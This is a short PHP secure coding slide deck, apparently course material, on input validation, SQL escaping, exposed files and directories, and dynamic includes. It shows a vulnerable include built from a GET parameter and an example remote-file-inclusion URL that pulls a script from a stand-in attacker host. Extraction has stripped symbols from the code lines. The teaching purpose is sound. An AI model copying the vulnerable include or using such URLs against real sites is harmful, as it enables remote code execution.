PHP Secure Coding

1
PHP Secure Coding

• Do not trust user input or any other input
• If you expect a number, typecast to a number by
  adding 0 to it
• // age should be a number
• age age 0

2
PHP Secure Coding

• Do not trust user input or any other input
• If you expect a string that will be part of an
  sql query, escape the and \ characters
• // city should be a string free of sql injected
  code
• city mysql_real_escape_string( city )

3
PHP Secure Coding

• Do not leave your directories exposed
• Not having an index file in your directory will
  expose all your files in that directory
• Set appropriate permissions for all your files
• Do not give more permissions than you need

4
PHP Secure Coding

• Even with an index file in each directory, you
  are still vulnerable to an attacker guessing the
  names of your files
• Example attacker may try to go directly to
• www.yahoo.com/www/Constants.inc
• Do not choose easy to guess directory or file
  names

5
PHP Secure Coding

• Do not leave a file exposed with an extension
  that makes it a text file or an html file
• DatabaseConstants.inc ? will be entirely visible
  in the web browser if accessed directly by the
  attacker with the correct url
• Instead, use the php extension ? if no echo
  statement, no output ? nothing in the browser

6
PHP Secure Coding

• Be aware of using dynamically generated include
  statements such as
• page _GET page
• include( page.php )
• The above code is using (user) input to include
  some php code that will run that code may end up
  not being yours

7
PHP Secure Coding

• If attacker enters in the url box
• http//leda.capitol-college.edu/hfranceschi/ct366
  /php/include/vulnerableHeader.php?pagehttp//www.
  hacker.com/attackerScript
• The file included will be
• http//www.hacker.com/attackerScript.php

8
PHP Secure Coding

• Your web server can protect against opening files
  that come from a different url by setting the
  configuration file appropriately
• Also, the attacker could run a script that is
  local to your server